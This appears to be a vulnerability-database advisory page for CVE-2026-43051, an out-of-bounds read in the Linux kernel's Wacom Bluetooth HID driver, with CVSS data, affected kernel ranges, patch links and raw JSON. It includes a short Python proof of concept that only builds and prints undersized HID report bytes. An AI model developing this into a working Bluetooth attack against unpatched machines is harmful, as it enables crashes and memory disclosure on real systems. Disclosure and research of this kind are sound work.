Security Vulnerability Report
中文
CVE-2026-43051 CVSS 8.1 HIGH

CVE-2026-43051

Published: 2026-05-01 15:16:52
Last Modified: 2026-05-07 18:00:03
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: HID: wacom: fix out-of-bounds read in wacom_intuos_bt_irq The wacom_intuos_bt_irq() function processes Bluetooth HID reports without sufficient bounds checking. A maliciously crafted short report can trigger an out-of-bounds read when copying data into the wacom structure. Specifically, report 0x03 requires at least 22 bytes to safely read the processed data and battery status, while report 0x04 (which falls through to 0x03) requires 32 bytes. Add explicit length checks for these report IDs and log a warning if a short report is received.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-43051: Linux Kernel HID wacom OOB Read # This script demonstrates the concept of sending a malformed Bluetooth HID report. # Note: Actual exploitation requires a Bluetooth adapter and specific hardware targeting. import struct def generate_malicious_packet(report_id, required_len, actual_len): """ Generates a malicious HID report packet. report_id: The ID of the report (e.g., 0x03 or 0x04) required_len: The minimum safe length expected by the driver actual_len: The actual length of the payload to be sent (shorter than required) """ if actual_len < 1: actual_len = 1 # Construct payload: Report ID + Arbitrary Data (shorter than required) # Report ID 0x03 requires 22 bytes, we send significantly less. payload = bytes([report_id]) + b'\x00' * (actual_len - 1) return payload def main(): print("[*] CVE-2026-43051 PoC Generator") print("[*] Target: Linux Kernel wacom_intuos_bt_irq") # Scenario 1: Report ID 0x03, expects 22 bytes, send 10 bytes poc_packet = generate_malicious_packet(report_id=0x03, required_len=22, actual_len=10) print(f"[*] Generated Malformed Packet (Report 0x03): {poc_packet.hex()}") print(f"[*] Packet Length: {len(poc_packet)} bytes (Expected >= 22 bytes)") print("[*] Sending this packet via Bluetooth to a vulnerable target may trigger an OOB read.") # Scenario 2: Report ID 0x04, expects 32 bytes, send 10 bytes poc_packet_2 = generate_malicious_packet(report_id=0x04, required_len=32, actual_len=10) print(f"[*] Generated Malformed Packet (Report 0x04): {poc_packet_2.hex()}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43051", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:51.543", "lastModified": "2026-05-07T18:00:03.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: wacom: fix out-of-bounds read in wacom_intuos_bt_irq\n\nThe wacom_intuos_bt_irq() function processes Bluetooth HID reports\nwithout sufficient bounds checking. A maliciously crafted short report\ncan trigger an out-of-bounds read when copying data into the wacom\nstructure.\n\nSpecifically, report 0x03 requires at least 22 bytes to safely read\nthe processed data and battery status, while report 0x04 (which\nfalls through to 0x03) requires 32 bytes.\n\nAdd explicit length checks for these report IDs and log a warning if\na short report is received."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3", "versionEndExcluding": "5.10.253", "matchCriteriaId": "9E0910F9-F22A-40F3-BD4D-C9E991B1FAD6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2f1763f62909ccb6386ac50350fa0abbf5bb16a9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3d78386b144453c47e81bf62dc3601b757f02d99", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/41026bcc0fdf82605205c27935ef719cbc07193b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5b5b9730111808410e404ceac2fabd32eef92fbd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8bd690ac1242332c73cba10dacdad6c6642bbb94", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8dc23c97680eebefde06da5858aaef1b37cf75d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d0ae84b3c9f3ea1a564eb1b7612113ca9fe8aada", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fa8901cb1f0b2113a342db93bd5684b59fe99dcf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.